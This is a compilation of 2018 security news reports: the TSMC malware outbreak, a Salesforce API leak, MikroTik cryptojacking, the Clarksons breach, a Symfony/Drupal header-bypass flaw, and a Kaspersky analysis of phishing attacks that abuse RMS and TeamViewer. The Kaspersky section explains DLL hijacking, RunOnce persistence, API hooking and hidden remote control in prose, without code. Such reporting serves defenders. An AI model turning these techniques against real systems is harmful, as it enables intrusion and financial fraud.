A piece of malware has caused significant disruptions in the factories of Taiwan Semiconductor Manufacturing Company (TSMC), the world’s biggest contract chipmaker.

TSMC’s most important customer is Apple, whose iPhone and iPad products use TSMC chips, but the company also supplies semiconductors to Qualcomm, Nvidia, AMD, MediaTek and Broadcom.

In a statement published on its website on Sunday, the company described the incident as a “computer virus outbreak” that impacted an unspecified number of computer systems and fabrication tools in Taiwan.

The infection was discovered on August 3 and the semiconductor foundry said it had restored 80 percent of systems by August 5, with a full recovery expected by August 6.

The company expects the incident to have a significant impact on its revenue for the third quarter. Financial Times reported that its revenue will take a hit of roughly $255 million.

“TSMC expects this incident to cause shipment delays and additional costs. We estimate the impact to third quarter revenue to be about three percent, and impact to gross margin to be about one percentage point. The Company is confident shipments delayed in third quarter will be recovered in the fourth quarter 2018, and maintains its forecast of high single-digit revenue growth for 2018 in U.S. dollars given on July 19, 2018,” TSMC stated.

“Most of TSMC’s customers have been notified of this event, and the Company is working closely with customers on their wafer delivery schedule. The details will be communicated with each customer individually over the next few days,” the company added.

According to TSMC, the malware made its way onto the network due to “misoperation” during the installation of a new tool. The company said the incident did not affect data integrity and it did not result in confidential information getting compromised.


Salesforce warns of API error that exposed Marketing data
5.8.2018 securityweek
Vulnerebility

The US Cloud-based customer relationship management software giant Salesforce is warning marketing customers of a data leakage caused by an API error.
The US cloud computing company Salesforce is warning marketing customers of a data leakage caused by an API error. The incident could potentially affect a large number of companies, including Aldo, Dunkin Donuts, GE, HauteLook, Nestle Waters, and Sony.

The error was in production between June 4 to July 18, and potentially affected users of two modules within the broader Marketing Cloud offering, the Email Studio and Predictive Intelligence solutions.

“On July 18, we became aware of an issue that impacted a subset of Marketing Cloud customers using Marketing Cloud Email Studio and Predictive Intelligence.” reads the notice published by Salesforce.

“We resolved the issue on that same day, July 18. Customers who may have been impacted were notified. For additional details, please see the Email Studio and Predictive Intelligence REST API Issue article here: https://sfdc.co/XIbG2”

salesforce marketing-cloud

The news was first reported by BankInfoSecurity that obtained a copy of the alert distributed by the company via email on Thursday.

Salesforce states that the error involved the company’s REST application programming interface.

“During a Marketing Cloud release between June 4, 2018, and July 7, a code change was introduced that, in rare cases, could have caused REST API calls to retrieve or write data from one customer’s account to another inadvertently,” reads the alert issued by Salesforce and published by BankInfoSecurity.

“Where the issue occurred, the API call may have failed and generated an error message rather than writing or modifying data.”

The company also warns that some customers may have had their data corrupted, it has also posted a knowledge article on the issue.

The bad news for the customers of the company. is that at the time it is not able to say if data was altered or is attackers maliciously tampered with.

“We have no evidence of malicious behavior associated with this issue,” a Salesforce spokesman told ISMG.

“We are unable to confirm if your data was viewed or modified by another customer,” Salesforce explained in its alert, noting that it was notifying all customers just to be on the safe side. “While Salesforce continues to conduct additional quality checks and testing in relation to this issue, we recommend that you monitor and review your data carefully to ensure the accuracy of your account.”


Do Businesses Know When They’re Using Unethical Data?
5.8.2018 securityweek Security

Data breaches are costly for businesses that expterience them, this data fuel the black markets and sometime are offered to complanies as legitimate data.
Data breaches are extraordinarily costly for businesses that experience them, both concerning reputational damage and money spent to repair the issues associated with those fiascos. And, on the consumer side of things, the scary thing is hackers don’t just steal data for notoriety. They do it to profit, typically by selling the snatched details online.

But, then, are other businesses aware of times when the data they just bought might have been stolen instead of legally obtained?

People Can Access Most of the Relevant Black Market Sites on Standard Browsers
There was a time when venturing into the world of the online black market typically meant downloading encryption software that hid the identity of users. However, most black market transactions happen on the “open” web so that it’s possible to access the respective sites via browsers like Firefox and Chrome without downloading special software first.

That means business representatives aren’t safe from coming across stolen data if they decide only to browse the internet normally. However, the kind of information advertised on the open web should be enough to raise eyebrows by itself. It often contains credit card information or sensitive medical details — not merely names, email addresses or phone numbers.

Companies can reduce the chances of unknowingly benefiting from stolen data by not proceeding with purchases if they contain private, not readily obtainable details.

Illegitimate Sellers Avoid Giving Payment Details
Even when people seek to profit by peddling stolen data, their desire to make money typically isn’t stronger than their need to remain anonymous. Most criminals who deal with data from illegal sources don’t reveal their names even when seeking payment. They’ll often request money through means that allow keeping their identities secret, such as Bitcoin.

Less Information, More Suspicion
If companies encounter data sellers that stay very secretive about how they get their data and whether it is in compliance with data protection and sharing standards, those are red flags.

However, even when data providers do list information about how they obtain data, it’s a good idea to validate the data on your own. For example, if you get calling data from a third-party provider, you should always check it against current Do Not Call lists.

Dark Web Monitoring Services Exist
As mentioned above, stolen data frequently works its way through the open web rather than the dark web. However, it’s still advisable for companies to utilize monitoring services that search the dark web for stolen data. The market for such information is lucrative, and some clients pay as much as $150,000 annually for such screening measures. If businesses provide data that comes up as originating from the dark web, that’s a strong indicator that it came from unethical sources.

data breaches

Do Legitimate Companies Create the Demand for Stolen Data?
It’s difficult to quantify how many reputable companies might be purchasing stolen data. If they do it knowingly, such a practice breaks the law. And, even if it happens without their knowledge, that’s still a poor reflection on those responsible. It means they didn’t carefully check data sources and sellers before going through with a purchase.

Unfortunately, analysts believe it happens frequently. After data breaches occur, some of the affected companies discover their data being sold online and buy it back. When hackers realize even those who initially had the data seized will pay for it, they realize there’s a demand for their criminal actions.

After suffering data breaches, some companies even ask their own employees to find stolen data and buy it back.

Most use intermediary parties, though representatives at major companies, including PayPal, acknowledge that this process of compensating hackers for the data they took occurs regularly. They say it’s part of the various actions that happen to protect customers — or to prevent them from knowing breaches happened at all.

If companies can find and recover their stolen data quickly enough, customers might never realize hackers had their details. That’s especially likely, since affected parties often don’t hear about breaches until months after companies do, giving those entities ample time to locate data and offer hackers a price for it.

Plus, it’s important to remember that companies pay tens of thousands of dollars to recover their data after ransomware attacks, too.

Should Businesses Bear the Blame?
When companies buy data that’s new to them, they should engage in the preventative measures above to verify its sources and check that it’s not stolen. Also, although businesses justify buying compromised data back from hackers, they have to remember that by doing so, they are stimulating demand — and that makes them partially to blame.

Instead of spending money to retrieve data that hackers take, those dollars would be better spent cracking down on the vulnerabilities that allow breaches to happen so frequently.


Russian troll factory suspected to be behind the attack against Italian President Mattarella
5.8.2018 securityweek BigBrothers

The Russian shadow behind the attack on Italian President Mattarella, a coordinated attack via Twitter involved hundreds of profiles inviting him to resign.
Cybersecurity experts and Italian media believe that the Italian President Sergio Mattarella is the last victim of the Russian troll farm.

On May 27 the late afternoon, thousands of Twitter profiles suddenly started spreading messages against the Italian president asking him to resign.

The messages appeared as a coordinated attack, they were using the hashtag #MattarellaDimettiti (Italian translation: “Mattarella resign”). Messages using this hashtag were rapidly spreading across the Internet, many other legitimate users started using it and it is quite easy to find similar legitimate message today.

But someone has triggered the protest online, someone who has clear interests to destabilize the Italian government.

Actual vice-premier Luigi Di Maio was asking for the indictment of President Mattarella who refused to endorse the choice of a candidate to the Minister of Economy because of his known anti-euro position.

The analysis of social media Twitter revealed that around at two o’clock in the morning there was an anomalous spike in the number of messages against the President Mattarella.

President Mattarella

Were they sleepless Italians or someone was attempting to influence the sentiment of the population on specific topics?

According to the Huffington Post Italy, in just a few minutes there were about 400 new profiles, that were traced back to a single origin, coordinating the misinformation campaign.

The Huffington Post reported that the Italian law enforcement Polizia Postale confirmed that the source of the campaign was one, but due to countermeasures adopted by the attackers was impossible to find the control room and attribute the attack to a specific threat actor.

“It is well known that, with high probability, it should have been created abroad, even if no one is able to say whether the Russian operators involved in disruptive actions in the American election campaign are involved.” states the Huffington Post citing the Italian newspaper Corriere della Sera.

According to the Huffington Post, at least twenty Twitter profiles involved in the attack against Italian President Mattarella belonging to completely unsuspecting Italians had been used one or more times by the Internet Research Agency (Ira) of Saint Petersburg, also known as the Russian troll factory.

The same accounts were involved in other propaganda campaigns in favor of populist parties, sovereignists, and anti-Europeans.

This is the conclusion of an analysis conducted on a sample composed of 67% of the archive related to the activity of the Internet Research Agency (Ira) that was published by the Firethirtyeight website.

The website published 3 Million Russian Troll tweets that were analyzed by the US prosecutor Robert Mueller as part of the investigation of the Russian influence on the 2016 Presidential election.

The huge number of tweets was collected by the researchers Darren Linvill and Patrick Warren from the Clemson University.

The archive includes roughly 16,000 tweets in the Italian language, according to the Italian newspaper Corriere della Sera, some of the accounts were particularly active and were fueling discussions against government representatives.

Now let me close with a simple consideration … the propaganda online attributed to the Internet Research Agency is really very noisy, and I fear it was designed to be so, likely under a wider diversionary strategy.

Involving more sophisticated technologies it is possible to obtain better results, let’s think of the involvement of artificial intelligence.

Putin said several times that the nation that leads in AI ‘will be the ruler of the world,’ and I’m sure that the involvement of machine learning systems in a troll factory can produce results much better than actual ones.

Is the Internet Research Agency itself the result of a bigger troll farm the already leverage artificial intelligence?


A malware paralyzed TSMC plants where also Apple produces its devices
5.8.2018 securityweek
Virus

A virus has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the plants where Apple produces its devices
A malware has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories on Friday night, the iPhone chipmaker plans.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

According to Bloomberg that first reported the news, the infection caused one of the most severe disruptions suffered by the company as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants will not able to restart before Sunday.
“The sole maker of the iPhone’s main processor said a number of its fabrication tools had been infected, and while it had contained the problem and resumed some production, several of its factories won’t restart till at least Sunday. The virus wasn’t introduced by a hacker, the company added in a statement.” states the Bloomberg.

“Certain factories returned to normal in a short period of time, and we expect the others will return to normal in one day,” the company said in its Saturday statement.

This is the first time that a malware cripples a TSMC facility paralyzing the production, according to the company “the degree of infection varied from factory to factory.”
“TSMC has been attacked by viruses before, but this is the first time a virus attack has affected our production lines,” Chief Financial Officer Lora Ho told Bloomberg News by phone.

TSMC Apple infection

The economic impact of this kind of incidents could be severe, at the time there is no info about losses caused by the attack on the Taiwanese firm.

At the time it is not possible to estimate the potential effects on the production of Apple devices, “the implications are also unclear for Apple.”

“The incident comes weeks after TSMC cheered investors with a rosy outlook for smartphone demand in the latter half of the year. That helped the market look past a reduced revenue outlook.” reported Bloomberg.

“A bellwether for the chip industry as well as an early indicator of iPhone demand, it heads into its busiest quarters grappling with waning enthusiasm for the high-powered chips used to mine digital currencies. Chief Executive Officer C. C. Wei had said TSMC’s sales will rise this year by a high single-digit percentage in U.S. dollar terms, down from an already reduced projection of about 10 percent”


MikroTik Routers Exploited in Massive Crypto-Mining Campaign
4.8.2018 securityweek
Exploit  Cryptocurrency

Attackers managed to infect tens of thousands of MikroTik network routers in Brazil with code that injects the CoinHive in-browser crypto-mining script into web traffic.

The attack emerged on July 31, when more than 70,000 MikroTik devices in the country started displaying the same behavior. With all using the same CoinHive site-key, it became apparent that a single actor was behind the attack.

No zero-day was used in this massive attack, as MikroTik, a Latvian router manufacturer, patched the targeted vulnerability back in April 2018. The issue, however, is that the vulnerable devices haven’t been updated in a timely manner.

At the moment, there are “hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave’s Simon Kenin, the researcher who analyzed the attack, reveals.

The employed exploit provides the attacker with the ability to read files from a vulnerable MikroTik router and get unauthenticated remote admin access to the device.

As part of this attack, however, the actor didn’t run a malicious executable on the router, but leveraged the device’s functionality to inject the CoinHive script into every web page the user visited.

For that, the attacker created a custom error page with the CoinHive script in it, which resulted in the user landing on that page when encountering any kind of error page while browsing. The attack works in both directions, meaning that users who visit websites behind those infected routers are impacted as well.

Initially, users would encounter the CoinHive script on every visited page, likely because the attacker, who appears to have high understanding of how the MikroTik routers work, might have built code to inject the script in every page.

In addition to modifying the device’s settings to serve the crypto-mining error page, the attacker also created a backdoor on the compromised devices. Kenin also noticed that the script has been updated several times during his investigation.

“The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected,” the researcher notes.

Kenin also noticed that, although the attack was initially focused on Brazil, MikroTik devices in other countries started being infected as well. In fact, he eventually discovered that over 170,000 routers globally appeared to have the CoinHive site-key.

By targeting MikroTik’s vulnerable carrier-grade router devices, the attackers ensured a broad reach: impacted are not only users behind the routers, but also the visitors of any website hosted behind such a router.

“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily,” Kenin points out.

While the routers were exploited to deliver a crypto-mining payload, the devices coudl have been exploited for other objectives, Sean Newman, Director Product Management at Corero Network Security, sold SecurityWeek. "From a DDoS perspective, the scale of processing power available in such devices could easily be leveraged for a single attack which could extend to tens of terabits per second, or many smaller attacks if they were used as part of a DDoS for hire service," Newman said.


Global Shipping Firm Clarksons Provides Update on 2017 Breach
3.8.2018 securityweek  Incindent

Clarkson PLC (Clarksons), a global shipping services firm, this week provided an update to the breach it suffered between May and November 2017. Little further on the nature of the breach is revealed, other than the extent of the customer personal information that was stolen.

In November 2017, Clarksons revealed that a single compromised user account had allowed attackers to infiltrate their systems, exfiltrate personal data, and demand a ransom for its safe return. Clarkson's declined to pay the ransom, and for some time it was expected that the data might be revealed. "I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised," said Andi Case, CEO of Clarksons.

In its latest statement (PDF) the firm claims it was able -- with the help of law enforcement and forensic specialists -- to successfully trace and recover the stolen data. It doesn't state -- and probably could not know -- whether the stolen data had been copied before it was recovered. It is nevertheless warning those potentially affected by the incident to, "Remain vigilant against incidents of identity theft and fraud by reviewing personal account statements for suspicious activity and to detect errors."

What is most surprising in this updated information is the extent of personal information that was stored by the company and stolen by the criminals. In full, the statement says,

"While the potentially affected personal information varies by individual, this data may include a date of birth, contact information, criminal conviction information, ethnicity, medical information, religion, login information, signature, tax information, insurance information, informal reference, national insurance number, passport information, social security number, visa/travel information, CV / resume, driver's license/vehicle identification information, seafarer information, bank account information, payment card information, financial information, address information and/or information concerning minors."

There is no mention of whether any of this data was encrypted or hashed. Identity theft, bank fraud and blackmail are the most obvious threats if such data were in the wrong hands.

"In this particular incident, what is honestly shocking is the amount of sensitive data that this single account had access to and I am sure the EU GDPR will be looking closely," comments Joseph Carson, chief security scientist at Thycotic. "If it is found that EU GDPR applies, and Clarkson PLC had failed to apply adequate security, they could be facing a huge financial penalty." Whether GDPR can be invoked will be up to the individual EU regulators. Clarksons claims the intruder had access to its systems from May 31, 2017 until November 4, 2017; which is before GDPR became active on May 25, 2018.

Rishi Bhargava, co-founder at Demisto, told SecurityWeek that Clarksons appears to have gone through the mechanics of breach notification conscientiously. "Clarksons seems to have provided updates and apprised affected individuals in a comprehensive and transparent manner," he said. "There are numerous cross-industry regulations to deal with while implementing breach notifications, and the granularity of US state-specific information shared by Clarksons is testament to that."

But he added, "The bigger question to consider is whether Clarksons needed to retain all this personal information in the first place. With GDPR introducing strict regulations for data processing, data consent, explicit need for processing, retention timelines, and deletion, organizations need to rethink their entire ‘data supply chain' if they haven't already. However transparent breach notifications are, they're still a post-breach exercise and need to be matched by operational data discipline in order to truly bring accountability to data processors."

It is possible that the tracing and recovery of the stolen data also implies knowledge of the perpetrator -- he or she may even be in custody. If this is true, it will probably be only through subsequent court documents that we discover exactly how the breach occurred. However, most security experts believe our knowledge so far points to a failure to use multi-factor authentication, and a failure to adequately manage privileged accounts.

Timur Kovalev, CTO at Untangle, told SecurityWeek, "While unfortunate, these sorts of breaches are certainly not uncommon. However, there are steps that organizations can take to mitigate their risk. Requiring multi-factor authentication for user accounts is a rational first step. Additionally, IT departments need to limit access of even properly credentialed users to only those apps and systems that are critical for that person's business use. Finally, companies can reduce the amount of customer data they are storing anywhere on networked systems; GDPR will certainly help accelerate this best practice."

Carson agrees. "The lesson to be learned from this incident is the importance in protecting accounts with privileged access to sensitive data and that those accounts should never use a password as the only security control. Similarly, a single account should never have full access to such a large amount of data -- at least without peer reviews and approval processes."

The question of whether Clarksons had a valid reason to store that amount of highly sensitive personal data remains one for the regulators.


Google Offers G Suite Alerts for State-Sponsored Attacks
3.8.2018 securityweek  Attack

Google this week announced that it can now alert G Suite admins when it believes users have been targeted by government-backed attackers.

The search company has been notifying users on what it believes might be state-sponsored attacks for over six years, and reaffirmed its commitment to continue alerting users on such incidents last year.

The Internet giant is now providing G Suite admins with the option to receive alerts whenever attacks appearing to be coming from a state-sponsored actor are targeting their users. The feature will show up in the G Suite Admin console as soon as it becomes available.

“If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method,” Google explains.

As usual, such alerts don’t necessarily imply that the account has been compromised or that the organization has been hit with a larger attack.

The new feature is turned off by default, but admins can easily enable or disable it in Admin Console > Reports > Manage Alerts > Government backed attack.

The feature also allows admins to set who is being notified when such attacks are detected (by default, super admins receive the notification via email).

Once an attack has been detected, admins can choose to secure the account suspected to have been targeted, and can also opt to alert the user on both the attack and the security measures taken.

The feature is set to gradually roll out to all G Suite editions and should be available for all admins within the next 15 days, Google said.

Companies such as Microsoft, Facebook, and Twitter are also warning users when detecting attacks believed to have been performed by a government-backed actor.


Industrial Sector targeted in surgical spear-phishing attacks
3.8.2018 securityaffairs 
Phishing

Industrial sector hit by a surgical spear-phishing campaign aimed at installing legitimate remote administration software on victims’ machines.
Attackers carried out a spear-phishing campaign against entities in the industrial sector, the messages disguised as commercial offers where used by attackers to deliver a legitimate remote administration software on victims’ systems (TeamViewer or Remote Manipulator System/Remote Utilities (RMS)).

Attackers personalized the content of each phishing email reflecting the activity of the target organization and the type of work performed by the employee to whom the email is sent.

The campaign was discovered by experts from Kaspersky Lab who speculate the attackers are financially motivated.

“Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.” reads the blog post published by Kaspersky.

“According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts,”

Once the attackers have gained access to the victim’s system they will search for any purchase documents, as well as the financial and accounting software. Then the crooks look for various ways in which they can monetize their effort, for example, by spoofing the bank details used to make payments.

According to Kaspersky, there was a spike in the number of spear phishing messages in November 2017 that targeted up to 400 industrial companies located in Russia.

industrial sector spear-phishing

The spear-phishing campaign is still ongoing, the messages purported to be invitations to tender from large industrial companies.

The quality of the phishing messages suggests the attackers have spent a significant effort in the reconnaissance phase.

“It is worth noting that the attackers addressed an employee of the company under attack by his or her full name,” state the researchers. “This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.”

The attackers used both malicious attachments and links to external resources that are used to download the malicious code.

“Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.” states the researchers.

“For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.”

Regarding the legitimate software used by the attackers, TeamViewer or Remote Manipulator System/Remote Utilities (RMS), for both, the attackers performed a DLL injection attack by injecting the malicious code directly into the process by substituting a malicious library for system DLL.

The malicious library includes the system file winspool.drv that is located in the system folder and is used to send documents to the printer.

The winspool.drv decrypts the attackers’ configuration files, including software settings and the password for remotely controlling the target machine.

In the case of RMS, one of the configuration files includes the email address used by the attacker to receive the information (i.e. computer name, username and the RMS machine’s internet ID) about the infected system.

When the attackers use TeamViewer software to exfiltrate system information, a file in a malicious library contains various parameters, including the password used for remotely controlling the system and a URL of the attackers’ command-and-control server.

Unlike RMS, Team Viewer also uses a built-in VPN to remotely control a computer located behind NAT.

“After launching, the malicious library checks whether an internet connection is available by executing the command “ping 1.1.1.1” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.” continues the analysis.

“Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.”

Kaspersky highlighted that the industrial sector is becoming a privileged target for crooks, they are able to make profits even using simple techniques and known malware.

The use of legitimate Remote administration software allows crooks to gain full control of compromised systems avoiding detection.

“This choice on the part of the cybercriminals could be explained by the fact that the threat-awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies),” Kaspersky concludes.


CVE-2018-14773 Symfony Flaw expose Drupal websites to hack
3.8.2018 securityaffairs 
Vulnerebility

A vulnerability in the Symfony HttpFoundation component tracked as CVE-2018-14773, could be exploited by attackers to take full control of the affected Drupal websites.
Maintainers at Drupal addressed the security bypass vulnerability by releasing a new version of the popular content management system, the version 8.5.6.

“The Drupal project uses the Symfony library. The Symfony library has released a security update that impacts Drupal. Refer to the Symfony security advisory for the issue. The same vulnerability also exists in the Zend Feed and Diactoros libraries included in Drupal core; however, Drupal core does not use the vulnerable functionality.” reads the advisory published by Drupal.

“If your site or module uses Zend Feed or Diactoros directly, read the Zend Framework security advisory and update or patch as needed.”

Symfony HttpFoundation component is a third-party library used in the Drupal Core, the flaw affects Drupal 8.x versions before 8.5.6.

Symfony is web application framework that is being used by a lot of projects, this means that the CVE-2018-14773 vulnerability could potentially affect a large number of web applications.

The flaw is due to the Symfony’s support for legacy and risky HTTP headers.

“Support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header allows a user to access one URL but have Symfony return a different one which can bypass restrictions on higher level caches and web servers.” reads the security advisory published by Symfony.

“The fix drops support for these two obsolete IIS headers: X-Original-URL and X_REWRITE_URL.” reads the security advisory published Symfony.

A remote attack can trigger the flaw by using specially crafted ‘X-Original-URL’ or ‘X-Rewrite-URL’ HTTP header value.

According to the security advisory published by Symfony, the version 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3 addressed the flaw.

CVE-2018-14773

The Drupal maintainers also found a similar issue affecting the Zend Feed and Diactoros libraries used in the Drupal Core. The libraries are affected by an ‘URL Rewrite vulnerability,’ anyway the Drupal team confirmed that the Drupal Core does not use the vulnerable functionality.

Administrators of websites that use Zend Feed or Diactoros directly need to patch them as soon as possible.

Drupal administrators need to patch their installs urgently before hackers will start exploiting the CVE-2018-14773 flaw.


Google introduced G Suite alerts for state-sponsored attacks
3.8.2018 securityaffairs  Attack

Google announced that has implemented an alerting system for G Suite admins when users have been targeted by state-sponsored attacks.
Google announced it will alert G Suite admins when state-sponsored hackers will target their users.

The new feature will be available in the G Suite Admin console very soon, it confirms the effort spent by the tech giant of protecting its users.

“We’re adding a feature in the Admin console that can alert admins if we believe a user’s account has been targeted by a government-backed attack. If an admin chooses to turn the feature on, an email alert (to admins) is triggered when we believe a government-backed attacker has likely attempted to access a user’s account or computer through phishing, malware, or another method.” reads the security advisory published by Google.

“It does not necessarily mean that the account has been compromised or that there was a widespread attack on an organization.”

In June 2012, for the first time, the company announced it was going to offer a specific protection service for a restrict number of users that could be the target of state-sponsored attacks.

Google is now implementing the new protection feature within the G Suite Admin console, admins will have the opportunity to receive alerts whenever attacks could be attributed to a nation-state actor.

Every time an attack will be detected, admins can choose to secure the account hit by the hackers and can also opt to alert the victim.

The alerts don’t necessarily imply that the account has been hacked or that the organization has been compromised in a massive attack.

G Suite state sponsored attacks

Google pointed out the alerts will be turned off by default, admins can choose to turn them on in the Admin Console > Reports > Manage Alerts > Government backed attack.

According to Google, the new feature is set to gradually roll out to all G Suite editions, the tech giant plans to make it available for all admins within the next 15 days.


Attacks on industrial enterprises using RMS and TeamViewer
3.8.2018 Kaspersky Attack

Main facts
Kaspersky Lab ICS CERT has identified a new wave of phishing emails with malicious attachments targeting primarily companies and organizations that are, in one way or another, associated with industrial production.

The phishing emails are disguised as legitimate commercial offers and are sent mainly to industrial companies located in Russia. The content of each email reflects the activity of the organization under attack and the type of work performed by the employee to whom the email is sent.

According to the data that we have collected, this series of attacks started in November 2017 and is currently in progress. Notably, the first similar attacks were recorded as far back as 2015.

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS). This enables the attackers to gain remote control of infected systems. The threat actor uses various techniques to mask the infection and the activity of malware installed in the system.

According to the data available, the attackers’ main goal is to steal money from victim organizations’ accounts. When attackers connect to a victim’s computer, they search for and analyze purchase documents, as well as the financial and accounting software used. After that, the attackers look for various ways in which they can commit financial fraud, such as spoofing the bank details used to make payments.

In cases where the cybercriminals need additional data or capabilities after infecting a system, such as privilege escalation and obtaining local administrator privileges, the theft of user authentication data for financial software and services, or Windows accounts for lateral movement, the attackers download an additional pack of malware to the system, which is specifically tailored to the attack on each individual victim. The malware pack can include spyware, additional remote administration utilities that extend the attackers’ control on infected systems, malware for exploiting operating system and application software vulnerabilities, as well as the Mimikatz utility, which provides the attackers with Windows account data.

Apparently, among other methods, the attackers obtain the information they need to perpetrate their criminal activity by analyzing the correspondence of employees at the enterprises attacked. They may also use the information found in these emails to prepare new attacks – against companies that partner with the current victim.

Clearly, on top of the financial losses, these attacks result in leaks of the victim organizations’ sensitive data.

Phishing emails
In most cases, the phishing emails have finance-related content; the names of attachments also point to their connection with finance. Specifically, some of the emails purport to be invitations to tender from large industrial companies (see below).

Malicious attachments may be packed into archives. Some of the emails have no attachments – in these cases, message text is designed to lure users into following links leading to external resources and downloading malicious objects from those resources.

Below is a sample phishing email used in attacks on some organizations:

Screenshot of a phishing email

The above email was sent on behalf of a well-known industrial organization. The domain name of the server from which the message was sent was similar to the domain name of that organization’s official website. The email had an archive attached to it. The archive was protected with a password that could be found in the message body.

It is worth noting that the attackers addressed an employee of the company under attack by his or her full name (this part of the email was masked in the screenshot above for confidentiality reasons). This indicates that the attack was carefully prepared and an individual email that included details relevant to the specific organization was created for each victim.

As part of the attacks, the threat actor uses various techniques to mask the infection. In this case, Seldon 1.7 – legitimate software designed to search for tenders – is installed in infected systems in addition to malware components and a remote administration application.

To keep users from wondering why they didn’t get information on the procurement tender referred to in the phishing email, the malicious program distributes a damaged copy of Seldon 1.7 software.

Window of legitimate software Seldon 1.7

In other cases, the user is shown a partially damaged image.

Image opened by malware

There is also a known case of malware being masked as a PDF document containing a bank transfer receipt. Curiously, the receipt contains valid data. Specifically, it mentions existing companies and their valid financial details; even a car’s VIN matches its model.

Screenshot of a bank transfer receipt displayed by malware

The malware used in these attacks installs legitimate remote administration software – TeamViewer or Remote Manipulator System/Remote Utilities (RMS).

Attacks using RMS
There are several known ways in which the malware can be installed in a system. Malicious files can be run either by an executable file attached to an email or by a specially crafted script for the Windows command interpreter.

For example, the archive mentioned above contains an executable file, which has the same name and is a password-protected self-extracting archive. The archive extracts the files and runs a script that installs and launches the actual malware in the system.

Contents of the malware installation file

It can be seen from the commands in the screenshot above that after copying the files the script deletes its own file and launches legitimate software in the system – Seldon v.1.7 and RMS, – enabling the attackers to control the infected system without the user’s knowledge.

Depending on the malware version, files are installed in %AppData%\LocalDataNT folder %AppData%\NTLocalData folder or in %AppData%\NTLocalAppData folder.

When it launches, legitimate RMS software loads dynamic libraries (DLL) required for the program’s operation, including the system file winspool.drv, which is located in the system folder and is used to send documents to the printer. RMS loads the library insecurely, using its relative path (the vendor has been notified of this vulnerability). This enables the attackers to conduct a DLL hijacking attack: they place a malicious library in the same directory with the RMS executable file, as a result of which a malware component loads and gains control instead of the corresponding system library.

The malicious library completes malware installation. Specifically, it creates a registry value responsible for automatically running RMS at system startup. Notably, in most cases of this campaign the registry value is placed in the RunOnce key, instead of the Run key, enabling the malware to run automatically only the next time the system starts up. After that, the malware needs to create the registry value again.

It is most likely that the attackers chose this approach to mask the presence of malware in the system as well as possible. The malicious library also implements techniques for resisting analysis and detection. One such technique involves dynamically importing Windows API functions using their hashes. This way, the attackers do not have to store the names of these functions in the malicious library’s body, which helps them to conceal the program’s real functionality from most analysis tools.

Part of a malicious code fragment implementing the dynamic import of functions

The malicious dynamic library, winspool.drv, decrypts configuration files prepared by the attackers, which contain RMS software settings, the password for remotely controlling the machine and the settings needed to notify the attackers that the system has been successfully infected.

One of the configuration files contains an email address to which information about the infected system is sent, including computer name, user name, the RMS machine’s Internet ID, etc. The Internet ID sent as part of this information is generated on a legitimate server of the RMS vendor after the computer connects to it. The identifier is subsequently used to connect to the remotely controlled system located behind NAT (a similar mechanism is also used in popular instant messaging solutions).

A list of email addresses found in the configuration files discovered is provided in the indicators of compromise section.

A modified version of RC4 is used to encrypt configuration files. Configuration files from the archive mentioned above are shown below.

Decrypted contents of InternetId.rcfg file

Decrypted contents of notification.rcfg file

Decrypted contents of Options.rcfg file

Decrypted contents of Password.rcfg file

After this, the attackers can use the system’s Internet ID and password to control it without the user’s knowledge via a legitimate RMS server, using the standard RMS client.

Attacks using TeamViewer
Attacks using legitimate TeamViewer software are very similar to those using RMS software, which are described above. A distinguishing feature is that information from infected systems is sent to malware command-and-control servers, rather than the attackers’ email address.

As in the case of RMS, malicious code is injected into the TeamViewer process by substituting a malicious library for system DLL. In the case of TeamViewer, msimg32.dll is used.

This is not a unique tactic. Legitimate TeamViewer software has been used in APT and cybercriminal attacks before. The best-known group to have used this toolset is TeamSpy Crew. We believe that the attacks described in this document are not associated with TeamSpy and are the result of known malware being re-used by another cybercriminal group. Curiously, the algorithm used to encrypt the configuration file and the password for decrypting it, which were identified in the process of analyzing these attacks, are the same as those published last April in a description of similar attacks.

It is common knowledge that legitimate TeamViewer software does not hide its startup or operation from the user and, specifically, notifies the user of incoming connections. At the same time, the attackers need to gain remote control of the infected system without the user’s knowledge. To achieve this, they hook several Windows API functions.

The functions are hooked using a well-known method called splicing. As a result, when legitimate software calls one of the Windows API functions, control is passed to the malicious DLL and the legitimate software gets a spoofed response instead of one from the operating system.

Windows API function hooked by the malware

Hooking Windows API functions enables attackers to hide TeamViewer windows, protect malware files from being detected, and control TeamViewer startup parameters.

After launching, the malicious library checks whether an internet connection is available by executing the command “ping 1.1.1.1” and then decrypts the malicious program’s configuration file tvr.cfg. The file contains various parameters, such as the password used for remotely controlling the system, URL of the attackers’ command-and-control server, parameters of the service under whose name TeamViewer will be installed, the User-Agent field of the HTTP header used in requests sent to the command-and-control server, VPN parameters for TeamViewer, etc.

